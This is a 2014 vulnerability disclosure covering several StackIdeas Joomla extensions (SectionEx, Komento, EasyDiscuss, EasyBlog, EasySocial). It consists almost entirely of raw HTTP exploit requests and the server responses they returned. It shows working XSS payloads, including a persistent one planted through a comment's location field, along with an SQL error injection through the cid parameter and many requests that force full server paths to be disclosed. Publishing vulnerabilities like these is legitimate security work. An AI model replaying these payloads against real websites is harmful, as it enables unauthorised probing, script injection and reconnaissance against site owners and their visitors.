#Title: Joomla StackIdeas Extensions Multiple Vulnerabilities
#Date: 01.23.2014
#Vendor: stackideas.com / extensions.joomla.org/extensions/owner/jack-2Estackideas
#Demo: demo.stackideas.com
#Contant: smash[at]devilteam.pl
#Note:
Tests were performed without an user account,
there is a high probability that there's more vulnerabilities.
#SectionEx - demo.stackideas.com/sectionex - Version 2.5.104 (Latest ATM)
1. Cross Site Scripting in Search Bar
Request (filter_title):
POST /sectionex HTTP/1.1
Host: demo.stackideas.com
filter_title=666" onmouseover=alert(666) bad="&task=§ionid=2&filter_order=&filter_order_Dir=
Request (filter_oreder_Dir):
POST /sectionex HTTP/1.1
Host: demo.stackideas.com
filter_title=666&task=§ionid=2&filter_order=&filter_order_Dir=" xssed=true bad="
filter_order_Dir is an hidden input parameter:
<input type="hidden" id="filter_order_Dir" name="filter_order_Dir" value="" xssed=true bad="" />
2. Full Path Disclosure in Search Bar
POST /sectionex HTTP/1.1
Host: demo.stackideas.com
filter_title[]=XSS&task[]=&task[]=§ionid[]=2&filter_order[]=&filter_order_Dir[]=
Error:
Warning: strtolower() expects parameter 1 to be string, array given in /home/admin/demo.stackideas.com/components/com_sectionex/models/category.php on line 649
#Komento - demo.stackideas.com/komento - Version 1.7.3 (Latest ATM)
1. Persistent Cross Site Scripting - Post Comment
POST /?option=com_komento HTTP/1.1
Host: demo.stackideas.com
tmpl=component&format=ajax&no_html=1&component=com_content&cid=2&comment=a&parent_id=0&name=666&email=&website=&subscribe=false&latitude=666&longitude=" onmouseover=alert(666) bad="&address=&contentLink=http%3A%2F%2Fdemo.stackideas.com%2Fkomento%2F2-starting-up-a-joomla-blog-with-easyblog&pageItemId=435&option=com_komento&namespace=site.views.komento.addcomment&80a1a7163a3f7e15ed93a3aeaf5abe37=1
You are able to inject code while adding custom Google Location.
Href is displayed next to your nick-name:
<i></i><a href="http://maps.google.com/maps?z=15&q=666" onmouseover=alert(666) bad="" target="_blank">666</a>
2. SQL Error
Request:
POST /?option=com_komento HTTP/1.1
Host: demo.stackideas.com
tmpl=component&format=ajax&no_html=1&component=com_content&cid=SUP&total=2&option=com_komento&namespace=site.views.komento.checknewcomment&c1403db176705ee19ee8b32f4257b2dc=1
Response:
HTTP/1.1 500 Internal Server Error
Date: Wed, 22 Jan 2014 20:31:01 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Status: 1054 Unknown column 'SUP' in 'where clause' SQL=SELECT COUNT(1) FROM `jos_komento_comments` WHERE `component` = 'com_content' AND `cid` = SUP AND `published` = '1'
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 6325
Connection: close
Content-Type: text/html; charset=utf-8
3. Full Path Disclosure - POST format
POST /?option=com_komento HTTP/1.1
Host: demo.stackideas.com
tmpl=component&format=666&no_html=1&option=com_komento&namespace=site.views.komento.shortenLink&17de86dda6e238e378e6208aa3d5467a=1
Response:
HTTP/1.1 200 OK
Date: Thu, 23 Jan 2014 20:04:31 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
Content-Length: 158
Connection: close
Content-Type: text/html; charset=UTF-8
Fatal error: Call to undefined method JDocumentRaw::addCustomTag() in /home/admin/demo.stackideas.com/media/foundry/3.1/joomla/configuration.php on line 111
#Easy Discuss - demo.stackideas.com/easydiscuss - Version 3.2.9289 (Latest ATM)
1. Full Path Disclosure
a) Subscribe via email
Request:
POST /index.php?option=com_easydiscuss&lang=none&tmpl=component&no_html=1&format=ajax&uid=1390488615438 HTTP/1.1
Host: demo.stackideas.com
&view=index&layout=ajaxSubscribe&value0=SUP?&value1=0&0767ca009520df2ba9b1b33569fd2d48=1
Error:
Invalid template file /home/admin/demo.stackideas.com/components/com_easydiscuss/themes/simplistic/dialogs/ajax.subscribe.SUP?.php
b) Language
Request:
POST /?option=com_easydiscuss&tmpl=component&no_html=1&controller=foundry&task=getResource HTTP/1.1
Host: demo.stackideas.com
resource%5B0%5D%5Btype%5D=languageSUP&resource%5B0%5D%5Bname%5D=COM_EASYDISCUSS_TERMS_PLEASE_ACCEPT&resource%5B0%5D%5Bid%5D=Resource07243760213479968'>"><>XSS&resource%5B1%5D%5Btype%5D=language&resource%5B1%5D%5Bname%5D=COM_EASYDISCUSS_COMMENT_SUCESSFULLY_ADDED&resource%5B1%5D%5Bid%5D=Resource08769055979183015&resource%5B2%5D%5Btype%5D=language&resource%5B2%5D%5Bname%5D=COM_EASYDISCUSS_COMMENT_LOAD_MORE&resource%5B2%5D%5Bid%5D=Resource0018291907032851662&resource%5B3%5D%5Btype%5D=language&resource%5B3%5D%5Bname%5D=COM_EASYDISCUSS_COMMENT_LOADING_MORE_COMMENTS&resource%5B3%5D%5Bid%5D=Resource034094943220855545&resource%5B4%5D%5Btype%5D=language&resource%5B4%5D%5Bname%5D=COM_EASYDISCUSS_COMMENT_LOAD_ERROR&resource%5B4%5D%5Bid%5D=Resource012465740294232164
Response:
HTTP/1.1 200 OK
Date: Thu, 23 Jan 2014 14:01:06 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
Content-Length: 189
Connection: close
Content-Type: text/html; charset=UTF-8
Fatal error: Call to undefined method EasyDiscussControllerFoundry::getLanguageSUP() in /home/admin/demo.stackideas.com/components/com_easydiscuss/controllers/foundry.php on line 26
c) Controller
Request:
POST /?option=com_easydiscuss&tmpl=component&no_html=1&controller=SUP&task=getResource
Error:
HTTP/1.1 500 Internal Server Error
Date: Thu, 23 Jan 2014 19:55:35 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Status: 500 Invalid Controller name "sup".<br /> File "/home/admin/demo.stackideas.com/components/com_easydiscuss/controllers/sup.php" does not exists in this context.
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 6325
Connection: close
Content-Type: text/html; charset=utf-8
d) Task
Request:
POST /?option=com_easydiscuss&tmpl=component&no_html=1&controller=foundry&task=SUP
Error:
HTTP/1.1 200 OK
Date: Thu, 23 Jan 2014 19:55:35 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
Content-Length: 167
Connection: close
Content-Type: text/html; charset=UTF-8
Fatal error: Call to a member function getName() on a non-object in /home/admin/demo.stackideas.com/components/com_easydiscuss/controllers/controller.php on line 234
e) Resource_type
POST /?option=com_easydiscuss&tmpl=component&no_html=1&controller=foundry&task=getResource HTTP/1.1
resource%5B0%5D%5Btype%5D='
HTTP/1.1 200 OK
Date: Thu, 23 Jan 2014 19:55:36 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
Content-Length: 173
Connection: close
Content-Type: text/html; charset=UTF-8
Fatal error: Call to undefined method EasyDiscussControllerFoundry::get'() in /home/admin/demo.stackideas.com/components/com_easydiscuss/controllers/foundry.php on line 26
#Easy Blog - demo.stackideas.com/easyblog - Version 3.9.15188 (Latest ATM)
1. Full Path Disclosure - Subscribe to blog
Request:
POST /index.php?option=com_easyblog&lang=none&Itemid=508&tmpl=component&no_html=1&format=ejax&17de86dda6e238e378e6208
&view=subscription&layout=showForm&value0[]=siteSUP
Error:
HTTP/1.1 200 OK
Date: Thu, 23 Jan 2014 20:22:09 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
Content-Length: 1847
Connection: close
Content-Type: text/html; charset=UTF-8
Warning: ucfirst() expects parameter 1 to be string, array given in /home/admin/demo.stackideas.com/components/com_easyblog/views/subscription/view.ejax.php on line 50
Warning: Cannot modify header information - headers already sent by (output started at /home/admin/demo.stackideas.com/components/com_easyblog/views/subscription/view.ejax.php:50) in /home/admin/demo.stackideas.com/components/com_easyblog/classes/ejax.php on line 120
2. Full Path Disclosure - Calendar value0 / value4 / value1 and so on
Request:
POST /index.php?option=com_easyblog&lang=none&Itemid=508&tmpl=component&no_html=1&format=ejax&17de86dda6e238e378e6208aa3d5467a=1&uid=1390512466510 HTTP/1.1
Host: demo.stackideas.com
&view=archive&layout=loadCalendar&value0='SUP'%3e%3c&value1=508&value2=small&value3=blog&value4=1391212800
Response:
HTTP/1.1 200 OK
Date: Thu, 23 Jan 2014 20:28:24 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
Content-Length: 3067
Connection: close
Content-Type: text/html; charset=UTF-8
Notice: Undefined variable: namespace in /home/admin/demo.stackideas.com/components/com_easyblog/views/archive/view.ejax.php on line 58
Notice: Undefined variable: namespace in /home/admin/demo.stackideas.com/components/com_easyblog/views/archive/view.ejax.php on line 59
Notice: Undefined variable: namespace in /home/admin/demo.stackideas.com/components/com_easyblog/views/archive/view.ejax.php on line 66
Notice: Undefined variable: preFix in /home/admin/demo.stackideas.com/components/com_easyblog/views/archive/view.ejax.php on line 67
Warning: Cannot modify header information - headers already sent by (output started at /home/admin/demo.stackideas.com/components/com_easyblog/views/archive/view.ejax.php:58) in /home/admin/demo.stackideas.com/components/com_easyblog/classes/ejax.php on line 120
3. Full Path Disclosure - Post a comment
Request:
POST /index.php?option=com_easyblog&lang=none&Itemid=508&tmpl=component&no_html=1&format=ejax&17de86dda6e238e378e6208aa3d5467a=1&uid=1390512714175 HTTP/1.1
Host: demo.stackideas.com
&view=Entry&layout=commentSave&value0[]=title%3D&value0[]=comment%3D%252526quot%25253B%25253E%25253C%25253EXSS&value0[]=esusername%3D%252526quot%25253B%25253E%25253C%25253EXSS&value0[]=esname%3D%252526quot%25253B%25253E%25253C%25253EXSS&value0[]=esemail%3D%252526quot%25253B%25253E%25253C%25253EXSS&value0[]=url%3D%252526quot%25253B%25253E%25253C%25253EXSS&value0[]=id%3D19&value0[]=parent_id%3D0&value0[]=comment_depth%3D0&value0[]=controller%3Dblog&value0[]=task%3DcommentSave&value0[]=totalComment%3D0&value0[]=%3DSubmit%252520Your%252520Comment
Response:
HTTP/1.1 200 OK
Date: Thu, 23 Jan 2014 20:32:34 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
Content-Length: 646
Connection: close
Content-Type: text/html; charset=UTF-8
Notice: Undefined index: comment in /home/admin/demo.stackideas.com/components/com_easyblog/views/entry/view.ejax.php on line 456
Warning: Cannot modify header information - headers already sent by (output started at /home/admin/demo.stackideas.com/components/com_easyblog/views/entry/view.ejax.php:456) in /home/admin/demo.stackideas.com/components/com_easyblog/classes/ejax.php on line 120
[["script","eblog.loader.doneLoading();"],["script","eblog.spinner.hide()"],["script","$(\"#comment\").addClass(\"input-error\");"],["script","eblog.element.focus('comment');"],["script","eblog.comment.displayInlineMsg('error', 'Comment is empty.');"]]
#Easy Social - extensions.joomla.org/extensions/clients-a-communities/communities/25616 - Version 1.1.5 (Latest ATM)
1. Full Path Disclosure - resource_type
Request:
POST /?option=com_easysocial&tmpl=component&no_html=1&controller=foundry&task=getResource HTTP/1.1
Host: demo.stackideas.com
resource%5B0%5D%5Btype%5D='%3e"%3e%3cSUP%3e&resource%5B0%5D%5Bname%5D=site%2Fnotifications%2Fsystem.empty&resource%5B0%5D%5Bid%5D=Resource07594590380558889
Response:
HTTP/1.1 200 OK
Date: Thu, 23 Jan 2014 20:46:32 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
Content-Length: 179
Connection: close
Content-Type: text/html; charset=UTF-8
Fatal error: Call to undefined method EasySocialControllerFoundry::get'>"><SUP>() in /home/admin/demo.stackideas.com/components/com_easysocial/controllers/foundry.php on line 42